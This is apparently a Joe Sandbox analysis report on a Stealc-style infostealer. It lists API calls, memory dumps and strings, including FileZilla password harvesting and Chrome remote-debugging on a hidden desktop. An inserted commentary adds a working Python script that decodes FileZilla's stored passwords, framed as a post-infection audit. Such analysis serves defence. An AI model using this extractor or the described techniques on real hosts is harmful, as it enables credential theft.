                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636DDF
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00636DF2
                          • lstrlen.KERNEL32(00000000), ref: 00636E01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636E49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636E71
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00636E94
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00636EA8
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00636EC9
                          • LocalFree.KERNEL32(00000000), ref: 00636ED4
                          • lstrlen.KERNEL32(?), ref: 00636F6E
                          • lstrlen.KERNEL32(?), ref: 00636F81
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 2641759534-2314656281
                          • Opcode ID: c48c69d16fd700ba535943ad97d770ccd1cab1567e09eaf38a13519b0e9e3d66
                          • Instruction ID: d16a132b5513e69dda70d78a911766a26f5b5ae0b748cb1222e4560cd1307341
                          • Opcode Fuzzy Hash: c48c69d16fd700ba535943ad97d770ccd1cab1567e09eaf38a13519b0e9e3d66
                          • Instruction Fuzzy Hash: 0B02A170A11726BBCB61ABB1DC59AAE7BBBBF04705F145518F846E7341DF38D8018BA0
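The routine above is the sample's FileZilla credential harvester: it scans the XML for the `<Host>`, `<Port>`, `<User>` and `<Pass encoding="base64">` elements, decodes the password with two CryptStringToBinaryA calls using flag 0x1 (CRYPT_STRING_BASE64; the first call with a NULL output buffer only returns the required length, then LocalAlloc(0x40 = LMEM_ZEROINIT) and the real decode), and emits the `browser: FileZilla` / `profile: null` / `url:` / `login: ` / `password: ` lines listed under String ID. The point for defenders is that FileZilla's "encoding" attribute is plain base64, not encryption, so anything that can read the file recovers the plaintext; only when a FileZilla master password is configured are stored passwords encrypted instead and this decode yields nothing usable. The following is an added Python example, not code from the sample or from Joe Sandbox, that reproduces the two-call decode over a constructed sitemanager.xml-style document so an analyst can audit what a FileZilla-aware stealer would have obtained from a host. The `<FileZilla3>/<Servers>/<Server>` wrapper is an assumption about the surrounding file layout; the four inner element names come from the report.

```python
"""
Added example (not code from the analysed sample or from Joe Sandbox).

Mirrors the FileZilla extraction routine at 0x00636E49-0x00636F81: look for
<Host>, <Port>, <User>, <Pass encoding="base64"> and base64-decode the password
the way CryptStringToBinaryA(..., CRYPT_STRING_BASE64) is used twice by the
sample (length query, then decode).  The <FileZilla3>/<Servers>/<Server>
wrapper is an assumption; the four element names are from the report.
"""
import base64
import binascii
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

CRYPT_STRING_BASE64 = 0x1  # third argument in both CryptStringToBinaryA calls


def crypt_string_to_binary(text: str, flags: int, out: Optional[bytearray]) -> int:
    """Stand-in for the CryptStringToBinaryA two-call idiom.

    out=None models the first call (NULL buffer): return the decoded length.
    With a buffer it models the second call: fill it and return the byte count.
    ValueError stands for the API returning FALSE on malformed input.
    """
    if flags != CRYPT_STRING_BASE64:
        raise NotImplementedError("only CRYPT_STRING_BASE64 is modelled")
    try:
        raw = base64.b64decode(text, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"not base64: {text!r}") from exc
    if out is not None:
        out[:] = raw
    return len(raw)


def extract_filezilla_entries(xml_text: str) -> List[Dict]:
    """One record per <Server>, shaped like the sample's output lines."""
    root = ET.fromstring(xml_text)
    records = []
    for server in root.iter("Server"):
        host = (server.findtext("Host") or "").strip()
        port = (server.findtext("Port") or "").strip()
        user = (server.findtext("User") or "").strip()
        pass_el = server.find("Pass")
        password = ""
        if pass_el is not None and pass_el.text:
            if pass_el.get("encoding") == "base64":
                needed = crypt_string_to_binary(pass_el.text, CRYPT_STRING_BASE64, None)
                buf = bytearray(needed)          # LocalAlloc(LMEM_ZEROINIT, needed)
                crypt_string_to_binary(pass_el.text, CRYPT_STRING_BASE64, buf)
                password = buf.decode("utf-8", errors="replace")
            else:
                password = pass_el.text         # very old configs store it raw
        records.append({"browser": "FileZilla", "profile": None,
                        "url": f"{host}:{port}" if port else host,
                        "login": user, "password": password})
    return records


def format_like_sample(record: Dict) -> str:
    """Render one record in the line format seen in the report's String ID."""
    profile = "null" if record["profile"] is None else record["profile"]
    return (f"browser: {record['browser']}\nprofile: {profile}\n"
            f"url: {record['url']}\nlogin: {record['login']}\n"
            f"password: {record['password']}\n")


# Constructed sample input (not captured from the analysed system).
SAMPLE_XML = """<?xml version="1.0"?>
<FileZilla3>
  <Servers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <User>deploy</User>
      <Pass encoding="base64">U3VwZXJTZWNyZXQxMjMh</Pass>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <User>backup</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
    </Server>
  </Servers>
</FileZilla3>
"""

if __name__ == "__main__":
    for rec in extract_filezilla_entries(SAMPLE_XML):
        print(format_like_sample(rec))
```

Run it against a copy of `%APPDATA%\FileZilla\sitemanager.xml` or `recentservers.xml` from a suspected host to enumerate exactly which accounts need rotating after a Stealc infection; every entry the script decodes is one the sample would have exfiltrated.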
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00634B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00634B7F
                          • lstrlen.KERNEL32(00654CA8), ref: 00634B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634BA7
                          • lstrcat.KERNEL32(00000000,00654CA8), ref: 00634BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00634BFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: prefs.js
                          • API String ID: 2567437900-3783873740
                          • Opcode ID: 3f4a91fc16060d2e5eb9192dac6751ceeee68c3d6174ce3b3cde26d0c8d31dab
                          • Instruction ID: ec1116db4b17e79c13984e99264700f637d6ef2ddd9595dc88282020f9d47272
                          • Opcode Fuzzy Hash: 3f4a91fc16060d2e5eb9192dac6751ceeee68c3d6174ce3b3cde26d0c8d31dab
                          • Instruction Fuzzy Hash: 66922F70A01B12CFDB64CF29D948B99B7E6BF44315F1981ADE84A9B361DB35EC41CB80
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00631291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006312B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006312BF
                          • lstrlen.KERNEL32(00654CA8), ref: 006312CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006312E7
                          • lstrcat.KERNEL32(00000000,00654CA8), ref: 006312F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0063133A
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0063135C
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 00631376
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006313AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 006313D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006313E2
                          • lstrlen.KERNEL32(00651794), ref: 006313ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063140A
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631416
                          • lstrlen.KERNEL32(?), ref: 00631423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631443
                          • lstrcat.KERNEL32(00000000,?), ref: 00631451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063147A
                          • StrCmpCA.SHLWAPI(?,0129CE18), ref: 006314A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 006314E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631535
                          • StrCmpCA.SHLWAPI(?,0129D468), ref: 00631552
                          • lstrcpy.KERNEL32(00000000,?), ref: 00631593
                          • lstrcpy.KERNEL32(00000000,?), ref: 006315BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006315E4
                          • StrCmpCA.SHLWAPI(?,0129CD58), ref: 00631602
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631633
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063165C
                          • lstrcpy.KERNEL32(00000000,?), ref: 00631685
                          • StrCmpCA.SHLWAPI(?,0129CE30), ref: 006316B3
                          • lstrcpy.KERNEL32(00000000,?), ref: 006316F4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063171D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631745
                          • lstrcpy.KERNEL32(00000000,?), ref: 00631796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006317BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 006317F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0063181C
                          • FindClose.KERNEL32(00000000), ref: 0063182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: f7d432f86ca2cea94230b1a629a585c34fc5d79f3f443a97b4014d377b79f99b
                          • Instruction ID: f8bdb766c3c7f52b9ce52a745044a0bf68eef881cf5e0c11ded2580f9338f6c4
                          • Opcode Fuzzy Hash: f7d432f86ca2cea94230b1a629a585c34fc5d79f3f443a97b4014d377b79f99b
                          • Instruction Fuzzy Hash: DF127071A107169BDB20EF79E899AEE77BABF45301F04452CF84ADB250DB38DC458B90
                          APIs
                          • wsprintfA.USER32 ref: 0063CBFC
                          • FindFirstFileA.KERNEL32(?,?), ref: 0063CC13
                          • lstrcat.KERNEL32(?,?), ref: 0063CC5F
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0063CC71
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 0063CC8B
                          • wsprintfA.USER32 ref: 0063CCB0
                          • PathMatchSpecA.SHLWAPI(?,01298B80), ref: 0063CCE2
                          • CoInitialize.OLE32(00000000), ref: 0063CCEE
                            • Part of subcall function 0063CAE0: CoCreateInstance.COMBASE(0064B110,00000000,00000001,0064B100,?), ref: 0063CB06
                            • Part of subcall function 0063CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0063CB46
                            • Part of subcall function 0063CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0063CBC9
                          • CoUninitialize.COMBASE ref: 0063CD09
                          • lstrcat.KERNEL32(?,?), ref: 0063CD2E
                          • lstrlen.KERNEL32(?), ref: 0063CD3B
                          • StrCmpCA.SHLWAPI(?,0064CFEC), ref: 0063CD55
                          • wsprintfA.USER32 ref: 0063CD7D
                          • wsprintfA.USER32 ref: 0063CD9C
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0063CDB0
                          • wsprintfA.USER32 ref: 0063CDD8
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0063CDF1
                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0063CE10
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 0063CE28
                          • CloseHandle.KERNEL32(00000000), ref: 0063CE33
                          • CloseHandle.KERNEL32(00000000), ref: 0063CE3F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0063CE54
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063CE94
                          • FindNextFileA.KERNEL32(?,?), ref: 0063CF8D
                          • FindClose.KERNEL32(?), ref: 0063CF9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                          • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 3860919712-2388001722
                          • Opcode ID: 9e10fb1a64f48fe1af79b0478268b2ecb678083a1b9a074e8367740bdbcbc081
                          • Instruction ID: ea0131fc5becd2cef573028f98914f9e28929c883a8e730f40be0d738b05c7d8
                          • Opcode Fuzzy Hash: 9e10fb1a64f48fe1af79b0478268b2ecb678083a1b9a074e8367740bdbcbc081
                          • Instruction Fuzzy Hash: F0C13071900319AFDB60DF64DC45AEE777ABF88311F044599F90AA7290EE34AA85CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00631291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006312B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006312BF
                          • lstrlen.KERNEL32(00654CA8), ref: 006312CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006312E7
                          • lstrcat.KERNEL32(00000000,00654CA8), ref: 006312F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0063133A
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0063135C
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 00631376
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006313AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 006313D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006313E2
                          • lstrlen.KERNEL32(00651794), ref: 006313ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063140A
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631416
                          • lstrlen.KERNEL32(?), ref: 00631423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631443
                          • lstrcat.KERNEL32(00000000,?), ref: 00631451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063147A
                          • StrCmpCA.SHLWAPI(?,0129CE18), ref: 006314A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 006314E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631535
                          • StrCmpCA.SHLWAPI(?,0129D468), ref: 00631552
                          • lstrcpy.KERNEL32(00000000,?), ref: 00631593
                          • lstrcpy.KERNEL32(00000000,?), ref: 006315BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006315E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00631796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006317BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 006317F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0063181C
                          • FindClose.KERNEL32(00000000), ref: 0063182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: 736fa34ff351e2161c0b25283d16a3d72598f538233d3af201908ba81e745402
                          • Instruction ID: b9e30690170dae55de3d292f9c76e00ec6c6c9173a3b95f2cb5519ef34411c9b
                          • Opcode Fuzzy Hash: 736fa34ff351e2161c0b25283d16a3d72598f538233d3af201908ba81e745402
                          • Instruction Fuzzy Hash: B0C1D270910B269BCB61EF75EC99AEE77BABF05301F040128F84A9B651DB38DD458BD0
                          APIs
                          • memset.MSVCRT ref: 00629790
                          • lstrcat.KERNEL32(?,?), ref: 006297A0
                          • lstrcat.KERNEL32(?,?), ref: 006297B1
                          • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 006297C3
                          • memset.MSVCRT ref: 006297D7
                            • Part of subcall function 00643E70: lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00643EA5
                            • Part of subcall function 00643E70: lstrcpy.KERNEL32(00000000,01299DD8), ref: 00643ECF
                            • Part of subcall function 00643E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0062134E,?,0000001A), ref: 00643ED9
                          • wsprintfA.USER32 ref: 00629806
                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00629827
                          • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00629844
                            • Part of subcall function 006446A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006446B9
                            • Part of subcall function 006446A0: Process32First.KERNEL32(00000000,00000128), ref: 006446C9
                            • Part of subcall function 006446A0: Process32Next.KERNEL32(00000000,00000128), ref: 006446DB
                            • Part of subcall function 006446A0: StrCmpCA.SHLWAPI(?,?), ref: 006446ED
                            • Part of subcall function 006446A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00644702
                            • Part of subcall function 006446A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00644711
                            • Part of subcall function 006446A0: CloseHandle.KERNEL32(00000000), ref: 00644718
                            • Part of subcall function 006446A0: Process32Next.KERNEL32(00000000,00000128), ref: 00644726
                            • Part of subcall function 006446A0: CloseHandle.KERNEL32(00000000), ref: 00644731
                          • lstrcat.KERNEL32(00000000,?), ref: 00629878
                          • lstrcat.KERNEL32(00000000,?), ref: 00629889
                          • lstrcat.KERNEL32(00000000,00654B60), ref: 0062989B
                          • memset.MSVCRT ref: 006298AF
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006298D4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00629903
                          • StrStrA.SHLWAPI(00000000,0129D990), ref: 00629919
                          • lstrcpyn.KERNEL32(008593D0,00000000,00000000), ref: 00629938
                          • lstrlen.KERNEL32(?), ref: 0062994B
                          • wsprintfA.USER32 ref: 0062995B
                          • lstrcpy.KERNEL32(?,00000000), ref: 00629971
                          • Sleep.KERNEL32(00001388), ref: 006299E7
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621557
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621579
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 0062159B
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 006215FF
                            • Part of subcall function 006292B0: strlen.MSVCRT ref: 006292E1
                            • Part of subcall function 006292B0: strlen.MSVCRT ref: 006292FA
                            • Part of subcall function 006292B0: strlen.MSVCRT ref: 00629399
                            • Part of subcall function 006292B0: strlen.MSVCRT ref: 006293E6
                            • Part of subcall function 00644740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00644759
                            • Part of subcall function 00644740: Process32First.KERNEL32(00000000,00000128), ref: 00644769
                            • Part of subcall function 00644740: Process32Next.KERNEL32(00000000,00000128), ref: 0064477B
                            • Part of subcall function 00644740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0064479C
                            • Part of subcall function 00644740: TerminateProcess.KERNEL32(00000000,00000000), ref: 006447AB
                            • Part of subcall function 00644740: CloseHandle.KERNEL32(00000000), ref: 006447B2
                            • Part of subcall function 00644740: Process32Next.KERNEL32(00000000,00000128), ref: 006447C0
                            • Part of subcall function 00644740: CloseHandle.KERNEL32(00000000), ref: 006447CB
                          • CloseDesktop.USER32(?), ref: 00629A1C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
